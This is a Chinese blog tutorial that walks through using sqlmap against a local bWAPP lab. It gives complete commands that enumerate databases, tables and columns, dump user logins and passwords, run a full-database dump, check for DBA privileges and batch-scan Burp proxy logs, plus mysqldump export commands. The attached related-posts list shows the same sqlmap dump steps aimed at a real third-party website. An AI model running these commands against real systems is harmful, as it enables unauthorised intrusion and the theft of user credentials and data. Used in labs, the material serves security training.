使用sqlmap获取数据步骤

已于 2023-10-01 14:23:15 修改
阅读量1.2k 收藏 1
点赞数
文章标签: 数据库
于 2023-10-01 12:56:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/133462426
版权

文章目录

1.使用sqlmap获取所有数据库

–dbs
python sqlmap.py -u “http://127.0.0.1:9004/sqli_2.php?movie=1&action=go” --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible” -f -b --batch --dbs
在这里插入图片描述

2.使用sqlmap获取当前连接数据库

–current-db
python sqlmap.py -u “http://127.0.0.1:9004/sqli_2.php?movie=1&action=go” --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible” -f -b --batch --current-db
在这里插入图片描述

3.使用sqlmap获取当前数据库下所有表名

-D bwapp --tables
python sqlmap.py -u “http://127.0.0.1:9004/sqli_2.php?movie=1&action=go” --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible” -f -b --batch -D bwapp --tables
在这里插入图片描述

4.使用sqlmap获取当前数据库下某个表下所有列名

-D bwapp -T users --column
python sqlmap.py -u “http://127.0.0.1:9004/sqli_2.php?movie=1&action=go” --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible” -f -b --batch -D bwapp -T users --column
在这里插入图片描述

5.使用sqlmap获取当前数据库下某个表下指定字段的数据

-D bwapp -T users --dump -C “login,password”
python sqlmap.py -u “http://127.0.0.1:9004/sqli_2.php?movie=1&action=go” --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible” -f -b --batch -D bwapp -T users --dump -C "login,password
在这里插入图片描述

6.测试当前用户是否是管理员

–is-dba
python sqlmap.py -u “http://127.0.0.1:9004/sqli_2.php?movie=1&action=go” --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible” --is-dba
在这里插入图片描述

7.使用burp+sqlmap批量检测

首先打开burp的project options
依次点击Misc,勾选Logging下Proxy的requests
在这里插入图片描述

然后起一个保持文件,比如sqlmap.log
接着开启代理,随意访问,比如访问刚才的靶场SQL Injection (GET/Select)
然后它会自动把访问数据包追加到log文件中
在这里插入图片描述

在这里插入图片描述

接着我们使用sqlmap可以对log里的所有数据进行检测
python sqlmap.py -l G:\资料\sqlmap.log --batch
在这里插入图片描述

8.脱库命令

sqlmap脱库方法 --dump-all
可以自动扫描出当前电脑所装所有数据库数据
python sqlmap.py -u “http://127.0.0.1:9004/sqli_2.php?movie=1&action=go” --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible” -f -b --batch --dump-all
在这里插入图片描述

mysql脱库方法
导出全部数据库
mysqldump -uroot -proot -A > allDatabase.sql
导出全部表空间信息
mysqldump -uroot -proot -A -Y > allTable.sql

9.sqlmap对post包的检测

–data=“movie=1&action=go”
–data后面是post包最下面的参数
在这里插入图片描述

python sqlmap.py -u “http://127.0.0.1:9004/sqli_13.php” --cookie=“BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible” --data=“movie=1&action=go” --batch
在这里插入图片描述

只为了拿0day
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap获取mysql数据库_(五)SQLMap工具检测SQL注入漏洞、获取数据库中的数据
weixin_39578516的博客
02-03 1008
目录结构利用SQLMap自动化工具,可判断某个带参数的url是否可被SQL注入,继而获取数据库和服务器的相关敏感数据和信息(如:库、表、列、字段值、数据库和服务器的名称&版本...)。本文以本地环境搭建的Web漏洞环境(OWASP Mutillidae+phpStudy)进行测试,具体操作流程如下:Mutillidae漏洞程序备注说明:因操作系统中同时安装有Python2和Python3的...
sqlmap使用_如何使用Sqlmap获取数据
weixin_39905695的博客
12-09 4662
我们在这里这里添加一个通过域名获取IP的命令 Sqlmap是一款开源的命令行自动SQL注入工具。它能够对多种主流数据库进行扫描支持,基于Python环境。它主要用于自动化地侦测和实施SQL注入攻击以及渗透数据库服务器。SQLMAP配有强大的侦测引擎,适用于高级渗透测试用户,不仅可以获得不同数据库的指纹信息,还可以从数据库中提取数据,此外还能够处理潜在的文...
作业3:使用 sqlmap 获取数据库信息
diligent_lee的博客
07-20 4347
作业三 1. 环境准备 在安装好 Python 的环境下运行以下命令安装 sqlmap: pip install sqlmap 安装 Python3 中用于连接 MySQL 服务器的一个库: pip install pymysql sqlmap 直连数据库测试: sqlmap -d mysql://root:cugjsj123@localhost:3306/login -f --banner 参数解释如下: -d:直连数据库,后面跟着连接信息。mysql://用户名:密码@主机名:
sqlmap脱库流程
最新发布
X1DD1Asad343的博客
05-31 320
1.探测漏洞是否存在sqlmap -u “https://www.ssc.edu.in/newsdetails.php?id=30”2.探测当前数据库用户sqlmap -u “https://www.ssc.edu.in/newsdetails.php?id=30” --current-users3.获取所有数据库sqlmap -u “https://www.ssc.edu.in/newsdetails.php?id=30” --dbs4.获取当前数据库sqlmap -u “https://www.ssc.
sqlmap获取目标
m_de_g的博客
08-24 1284
从文本文件中读取Http请求作为Sql注入探测的目标。从sitemap.xml站点地图文件中读取目标探测。从多行文本格式文件读取多个目标,对多个目标进行探测。sqlmap支持直连数据库,通过以下命令来直连。从配置文件sqlmap.conf中读取目标探测。sqlmap直接对单一URL探测,参数使用。种注入的方式,web服务器的操作系统是。支持从不同类型的文件中读取目标进行。通过探测可以知道,此处的。:表示数据库的用户名。
sqlmap工具的使用
weixin_65633498的博客
04-12 371
若在kail中实验,则协议中需要包含目标主机的真实IP地址.# 测试过程中需注意phpstudy的版本。# 防火墙可能会导致测试失败。获取指定数据库的所有表名。获取表名 ------
SQLMAP神器使用.pdf
01-05
总的来说,SQLMap是一个功能强大的SQL注入工具,通过自动化的方式帮助检测和利用SQL注入漏洞,其丰富的命令行选项使得测试和数据提取更加灵活和高效。正确理解和使用SQLMap对于网站安全评估和漏洞修复至关重要。
使用sqlmap+burpsuite进行中级sql注入
06-01
7. **提取数据**: 最后,我们使用`--dump`选项获取指定列的数据: ``` root@kali:~# sqlmap -r zyllmn.txt -D dvwa -T users -C "user,password" --dump ``` 这将导出`users`表中`user`和`password`列的所有...
sqlmap使用手册
12-11
3. **实战演练**: 使用SQLMap对模拟环境或已知存在注入漏洞的靶机进行实战操作,练习探测、数据抽取和权限升级等。 4. **分析输出**: 分析SQLMap的输出结果,理解其如何判断注入点,以及如何进行下一步操作。 5. *...
SQLMAP Windows
02-23
在Windows上安装和使用SQLMAP,你需要遵循以下步骤: 1. **下载与安装**:从官方网站或者其他可信源下载最新版本的SQLMAP,通常是Python脚本文件。确保你的系统已经安装了Python环境。 2. **解压与配置**:将下载...
网络安全 sql注入工具sqlmap使用
01-13
Sqlmap使用非常简单,基本上可以分为五个步骤: 1. 查看数据库使用命令`python sqlmap -u 存在注入的 URL 地址 --dbs`可以查看目标数据库服务器上的所有数据库。 2. 查看表名:使用命令`python sqlmap -u 存在...
取出Map中的数据
qq_40504777的博客
08-02 351
let data = new Map(); data.set('key1', 1); data.set('key2', 3); data.set('key3', 1); console.log(data)//Map { 'key1' => 1, 'key2' => 3, 'key3' => 1 } console.log([...data.values()])//[ 1, 3, 1 ]
Web渗透-Sqlmap工具使用
m0_62630794的博客
01-25 3623
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB。以上的查询是指定带参数的url,同样我们也可以从文本文件中获取HTTP请求,这样就可以不设置其他参数。–tables是查询指定数据库里面的表。
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
利用sqlmap工具进行sql注入窃取用户数据库信息
sdc5730399的博客
06-27 1462
一、工具介绍 sqlmap + python2.7 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞,具体工具可以到https://github.com/sdc5730399/information-security下载 二、爆破过程 获取PHPSESSID,如下图所示 爆数据库 D:\信息安全\sqlmap\sqlmapproject-sql...
sqlmap使用详细讲解
mogexiuluo的博客
05-29 2693
简介:是一个自动化的sql注入工具,主要功能扫描、发现并利用给定的url的sql注入漏洞,内置了很多插件sqlmap支持的数据库: MySQL、oracle、sql-server、DB2....注意:sqlmap只用来检测和sql注入,不能扫描网站的漏洞sqlmap使用的sql注入方式:1、基于布尔类型盲注:可以根据页面的返回判断条件真假的注入2、基于时间的盲注;根据页面返回内容判断,延迟时间是否执行3、基于报错注入:根据页面返回的错误信息。
Spark SQL集合数据类型array\map的取值方式
wang_wbq的博客
03-24 2万+
Spark SQL集合数据类型array\map的取值方式 版权声明:本文为博主原创文章,未经博主允许不得转载。 手动码字不易,请大家尊重劳动成果,谢谢 作者:http://blog.csdn.net/wang_wbq 本节主要讨论集合数据类型:数组\列表array、字典map这两种数据类型的索引,首先我们还是先构造数据结构与DataFrame: scala&...
sqlmap使用
weixin_53440207的博客
02-20 3939
sqlmap详细使用
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
dzqxwzoe的博客
09-05 1万+
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用数据库4、查看「数据表」5、查看「字段」6、查看「数据」
windows使用sqlmap
11-28
以下是在Windows上使用SQLMap步骤: 1. 首先,你需要下载SQLMap。你可以从官方网站https://sqlmap.org/下载最新版本的SQLMap。 2. 解压缩下载的文件,将其放在你想要的位置。 3. 打开命令提示符并导航到SQLMap所在的目录。 4. 现在,你可以使用以下命令来测试一个目标URL是否存在SQL注入漏洞: ``` python sqlmap.py -u <目标URL> ``` 例如: ``` python sqlmap.py -u http://example.com/index.php?id=1 ``` 5. 如果目标存在SQL注入漏洞,你可以使用以下命令来获取数据库的所有表: ``` python sqlmap.py -u <目标URL> --tables ``` 例如: ``` python sqlmap.py -u http://example.com/index.php?id=1 --tables ``` 6. 如果你想要获取表中的所有列,可以使用以下命令: ``` python sqlmap.py -u <目标URL> -T <表名> --columns ``` 例如: ``` python sqlmap.py -u http://example.com/index.php?id=1 -T users --columns ``` 7. 最后,如果你想要获取表中的所有数据,可以使用以下命令: ``` python sqlmap.py -u <目标URL> -T <表名> -C <列名> --dump ``` 例如: ``` python sqlmap.py -u http://example.com/index.php?id=1 -T users -C username,password --dump ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值